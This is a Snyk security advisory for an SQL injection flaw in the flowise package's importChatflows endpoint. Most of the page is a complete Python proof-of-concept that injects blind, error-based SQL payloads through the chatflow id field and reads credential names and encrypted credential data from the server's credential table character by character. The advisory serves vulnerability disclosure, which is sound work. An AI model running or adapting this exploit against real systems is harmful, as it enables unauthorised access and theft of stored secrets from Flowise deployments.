SQL Injection: Hibernate Affecting flowise package, versions *


Severity

Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-JS-FLOWISE-9734391
  • published17 Apr 2025
  • disclosed7 Apr 2025
  • creditTribal1012

Introduced: 7 Apr 2025

New CVE NOT AVAILABLE CWE-564  (opens in a new tab)

How to fix?

A fix was pushed into the master branch but not yet published.

Overview

flowise is a Flowiseai Server

Affected versions of this package are vulnerable to SQL Injection: Hibernate via the importChatflows process. An attacker can execute arbitrary SQL commands by injecting malicious SQL code into the input parameters.

PoC

import argparse
import requests


def import_chatflows(
    url: str,
    token: str,
    payload: dict
):
    response = requests.post(
        f'{url}/api/v1/chatflows/importchatflows',
        headers={
            'Authorization': f'Bearer {token}'
            # 'Authorization': f'Basic {token}'
        },
        json=payload
    )

    return response.json()


def import_normal_data(
    api_url: str,
    token: str,
    normal_data: str
):
    data_id = 'aaaaaa'

    payload = {
        "Chatflows": [
            {
                "id": data_id,
                "name": normal_data,
                "flowData": "{}"
            }
        ]
    }

    import_chatflows(
        url=api_url,
        token=token,
        payload=payload
    )
    return data_id


def get_character(
    api_url: str,
    token: str,
    data_id: str,
    column_name: str,
    index: int
):
    injection_query = f'(SELECT ascii(substr({column_name},{index},1)) FROM credential limit 0,1)'

    def create_payload(
        c: int
    ):
        return f"{data_id}') and if (({injection_query})<{c}, 0, 9e300 * 9e300); -- "

    chatflows_json = {
        "Chatflows": [
            {
                "id": "",
                "name": data_id,
                "flowData": "{}"
            }
        ]
    }

    bitbox = [
        64, 32, 16, 8, 4, 2, 1
    ]
    character = 0
    for bit in bitbox:
        payload = create_payload(c=character + bit)
        chatflows_json['Chatflows'][0]['id'] = payload

        res = import_chatflows(
            url=api_url,
            token=token,
            payload=chatflows_json
        )
        if 'DOUBLE value is out of range' in res['message']:
            # character is more then bit
            character += bit
        else:
            # character is less then bit
            character += 0

    return chr(character)


def get_length(
    api_url: str,
    token: str,
    data_id: str,
    column_name: str
):
    injection_query = f'(SELECT length({column_name}) FROM credential limit 0,1)'

    def create_payload(
        c: int
    ):
        return f"{data_id}') and if (({injection_query})<{c}, 0, 9e300 * 9e300); -- "

    chatflows_json = {
        "Chatflows": [
            {
                "id": "",
                "name": data_id,
                "flowData": "{}"
            }
        ]
    }

    column_len = 0
    bitbox = [
        256, 128, 64, 32, 16, 8, 4, 2, 1
    ]
    for bit in bitbox:
        payload = create_payload(c=column_len + bit)
        chatflows_json['Chatflows'][0]['id'] = payload

        res = import_chatflows(
            url=api_url,
            token=token,
            payload=chatflows_json
        )
        if 'DOUBLE value is out of range' in res['message']:
            # column_len is more then bit
            column_len += bit
        else:
            # column_len is less then bit
            column_len += 0

    return column_len


def main(
    url: str,
    token: str
):
    api_url = url

    column_box = [
        'credentialName',
        'encryptedData'
    ]

    data_id = import_normal_data(
        api_url=api_url,
        token=token,
        normal_data='flow01'
    )

    for column_name in column_box:
        column_len = get_length(
            api_url=api_url,
            token=token,
            data_id=data_id,
            column_name=column_name
        )

        print(f'[+] {column_name} length is {column_len}')

        result = ''
        for i in range(column_len):
            result += get_character(
                api_url=api_url,
                token=token,
                data_id=data_id,
                column_name=column_name,
                index=i + 1
            )

        print(f'[+] {column_name}: {result}')


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '--url',
        type=str,
        default='http://flowise:3000'
    )
    parser.add_argument(
        '--access',
        type=str,
        required=True,
        help='Get from http://flowise:3000/apikey'
    )

    m_args = parser.parse_args()

    main(
        url=m_args.url,
        token=m_args.access
    )

CVSS Base Scores

version 4.0
version 3.1